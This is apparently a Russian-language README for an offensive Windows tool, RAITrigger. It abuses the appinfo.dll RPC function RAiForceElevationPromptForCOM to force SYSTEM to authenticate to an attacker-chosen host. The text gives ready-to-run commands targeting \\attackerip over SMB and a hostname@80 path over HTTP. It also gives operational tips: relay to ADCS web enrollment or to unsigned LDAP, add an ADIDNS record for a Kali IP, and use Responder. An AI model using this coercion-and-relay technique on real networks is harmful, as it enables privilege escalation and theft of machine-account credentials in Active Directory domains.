
Локальный триггер аутентификации SYSTEM для ретрансляции
RPC-функция RAiForceElevationPromptForCOM из библиотеки appinfo.dll позволяет принудить SYSTEM к аутентификации. Это работает только в системах, входящих в домен. Оказывается, эту функцию может вызвать любой пользователь с низкими привилегиями (не для запуска процесса), но для того чтобы вызвать аутентификацию SYSTEM в произвольное место. Это происходит потому, что CreateFileW вызывается от имени SYSTEM к расположению первого входного параметра:
Поскольку олицетворение низкопривилегированного пользователя всё ещё действует, это нельзя использовать как триггер Potato для повышения привилегий с SEImpersonate до SYSTEM:
Но это можно использовать для запроса сертификата учётной записи компьютера в ADCS, когда включена веб-регистрация, с входящей SMB-аутентификацией. Или это можно использовать для LPE с ретрансляцией на LDAP — когда не включена подпись LDAP.
Для запуска SMB-аутентификации:
[*] RAITrigger.exe \\attackerip\test\test.exe
Для запуска HTTP-аутентификации (должна быть включена служба WebClient):
[*] RAITrigger.exe \\hostname@80\test\test.exe
HTTP-аутентификация срабатывает только для систем в доверенной интранет-зоне, поэтому вам нужно будет создать запись ADIDNS для вашего IP-адреса Kali или находиться в той же подсети и использовать, например, Responder. Никогда не используйте полное FQDN, только имя хоста.
Вызов этой функции удалённо (даже с правами локального администратора) приводит к rpc_access_denied, так что это не альтернатива, например, PetitPotam или подобным: